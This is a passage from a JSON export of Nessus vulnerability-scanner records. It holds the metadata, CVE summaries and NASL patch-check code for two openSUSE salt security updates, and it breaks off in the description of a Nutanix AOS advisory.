(CVE-2021-31607)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-28T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : salt (openSUSE-SU-2021:0899-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25592", "CVE-2021-25315", "CVE-2021-31607"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:python3-salt", "p-cpe:/a:novell:opensuse:salt", "p-cpe:/a:novell:opensuse:salt-api", "p-cpe:/a:novell:opensuse:salt-bash-completion", "p-cpe:/a:novell:opensuse:salt-cloud", "p-cpe:/a:novell:opensuse:salt-fish-completion", "p-cpe:/a:novell:opensuse:salt-master", "p-cpe:/a:novell:opensuse:salt-minion", "p-cpe:/a:novell:opensuse:salt-proxy", "p-cpe:/a:novell:opensuse:salt-ssh", "p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration", "p-cpe:/a:novell:opensuse:salt-syndic", "p-cpe:/a:novell:opensuse:salt-transactional-update", 
"p-cpe:/a:novell:opensuse:salt-zsh-completion", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-899.NASL", "href": "https://www.tenable.com/plugins/nessus/151062", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:0899-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151062);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-15750\",\n \"CVE-2018-15751\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\",\n \"CVE-2020-25592\",\n \"CVE-2021-25315\",\n \"CVE-2021-31607\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0524-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0134\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"openSUSE 15 Security Update : salt (openSUSE-SU-2021:0899-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:0899-1 advisory.\n\n - Directory Traversal vulnerability in salt-api in SaltStack Salt before 2017.7.8 and 2018.3.x before\n 2018.3.3 allows remote attackers to determine which files exist on the server. (CVE-2018-15750)\n\n - SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allow remote attackers to bypass\n authentication and execute arbitrary commands via salt-api(netapi). 
(CVE-2018-15751)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user tokens from the salt master and/or run\n arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - In SaltStack Salt through 3002, salt-netapi improperly validates eauth credentials and tokens. A user can\n bypass authentication and invoke Salt SSH. (CVE-2020-25592)\n\n - A Incorrect Implementation of Authentication Algorithm vulnerability in of SUSE SUSE Linux Enterprise\n Server 15 SP 3; openSUSE Tumbleweed allows local attackers to execute arbitrary code via salt without the\n need to specify valid credentials. This issue affects: SUSE SUSE Linux Enterprise Server 15 SP 3 salt\n versions prior to 3002.2-3. openSUSE Tumbleweed salt version 3002.2-2.1 and prior versions.\n (CVE-2021-25315)\n\n - In SaltStack Salt 2016.9 through 3002.6, a command injection vulnerability exists in the snapper module\n that allows for local privilege escalation on a minion. The attack requires that a file is created with a\n pathname that is backed up by snapper, and that the master calls the snapper.diff function (which executes\n popen unsafely). 
(CVE-2021-31607)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1171257\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1176293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1179831\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1181368\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182281\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182382\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1185092\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1185281\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186674\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6E3YAO2VV3WBUS7PMAT26ZYDS3AXW5VL/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d1637da9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15750\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15751\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-25592\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-25315\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2021-31607\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25592\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-fish-completion\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-transactional-update\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'python3-salt-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-api-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-bash-completion-3002.2-lp152.3.36.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-cloud-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-fish-completion-3002.2-lp152.3.36.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-master-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-minion-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-proxy-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-ssh-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-standalone-formulas-configuration-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-syndic-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-transactional-update-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-zsh-completion-3002.2-lp152.3.36.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'python3-salt / salt / salt-api / salt-bash-completion / salt-cloud / etc');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:52:06", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:2106-1 
advisory.\n\n - Directory Traversal vulnerability in salt-api in SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allows remote attackers to determine which files exist on the server. (CVE-2018-15750)\n\n - SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allow remote attackers to bypass authentication and execute arbitrary commands via salt-api(netapi). (CVE-2018-15751)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - In SaltStack Salt through 3002, salt-netapi improperly validates eauth credentials and tokens. A user can bypass authentication and invoke Salt SSH. (CVE-2020-25592)\n\n - A Incorrect Implementation of Authentication Algorithm vulnerability in of SUSE SUSE Linux Enterprise Server 15 SP 3; openSUSE Tumbleweed allows local attackers to execute arbitrary code via salt without the need to specify valid credentials. This issue affects: SUSE SUSE Linux Enterprise Server 15 SP 3 salt versions prior to 3002.2-3. openSUSE Tumbleweed salt version 3002.2-2.1 and prior versions.\n (CVE-2021-25315)\n\n - In SaltStack Salt 2016.9 through 3002.6, a command injection vulnerability exists in the snapper module that allows for local privilege escalation on a minion. The attack requires that a file is created with a pathname that is backed up by snapper, and that the master calls the snapper.diff function (which executes popen unsafely). 
(CVE-2021-31607)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-16T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : salt (openSUSE-SU-2021:2106-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25592", "CVE-2021-25315", "CVE-2021-31607"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:python2-distro", "p-cpe:/a:novell:opensuse:python3-distro", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-2106.NASL", "href": "https://www.tenable.com/plugins/nessus/151732", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:2106-1. 
The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151732);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-15750\",\n \"CVE-2018-15751\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\",\n \"CVE-2020-25592\",\n \"CVE-2021-25315\",\n \"CVE-2021-31607\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0524-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0134\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"openSUSE 15 Security Update : salt (openSUSE-SU-2021:2106-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:2106-1 advisory.\n\n - Directory Traversal vulnerability in salt-api in SaltStack Salt before 2017.7.8 and 2018.3.x before\n 2018.3.3 allows remote attackers to determine which files exist on the server. (CVE-2018-15750)\n\n - SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allow remote attackers to bypass\n authentication and execute arbitrary commands via salt-api(netapi). (CVE-2018-15751)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user tokens from the salt master and/or run\n arbitrary commands on salt minions. 
(CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - In SaltStack Salt through 3002, salt-netapi improperly validates eauth credentials and tokens. A user can\n bypass authentication and invoke Salt SSH. (CVE-2020-25592)\n\n - A Incorrect Implementation of Authentication Algorithm vulnerability in of SUSE SUSE Linux Enterprise\n Server 15 SP 3; openSUSE Tumbleweed allows local attackers to execute arbitrary code via salt without the\n need to specify valid credentials. This issue affects: SUSE SUSE Linux Enterprise Server 15 SP 3 salt\n versions prior to 3002.2-3. openSUSE Tumbleweed salt version 3002.2-2.1 and prior versions.\n (CVE-2021-25315)\n\n - In SaltStack Salt 2016.9 through 3002.6, a command injection vulnerability exists in the snapper module\n that allows for local privilege escalation on a minion. The attack requires that a file is created with a\n pathname that is backed up by snapper, and that the master calls the snapper.diff function (which executes\n popen unsafely). 
(CVE-2021-31607)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1171257\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1176293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1179831\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1181368\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182281\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182382\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1185092\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1185281\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186674\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MU6P3NIODW6ZMC4HZLBROO6ZEOD5KAUX/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?410d07bc\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15750\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15751\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-25592\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-25315\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2021-31607\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected python2-distro and / or python3-distro packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25592\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python2-distro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-distro\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'python2-distro-1.5.0-3.5.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-distro-1.5.0-3.5.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : 
SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'python2-distro / python3-distro');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-10T19:27:53", "description": "The version of AOS installed on the remote host is prior to 6.0.2.5. It is, therefore, affected by multiple vulnerabilities as referenced in the NXSA-AOS-6.0.2.5 advisory.\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory corruption) via a crafted XML document. (CVE-2016-4658)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after- free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is called, aka CID-f5449e74802c. (CVE-2020-36385)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. 
This flaw allows an attacker who can convince a victim to install a seemingly verifiable package, whose signature header was modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is to data integrity, confidentiality, and system availability. (CVE-2021-20271)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. (CVE-2021-22543)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 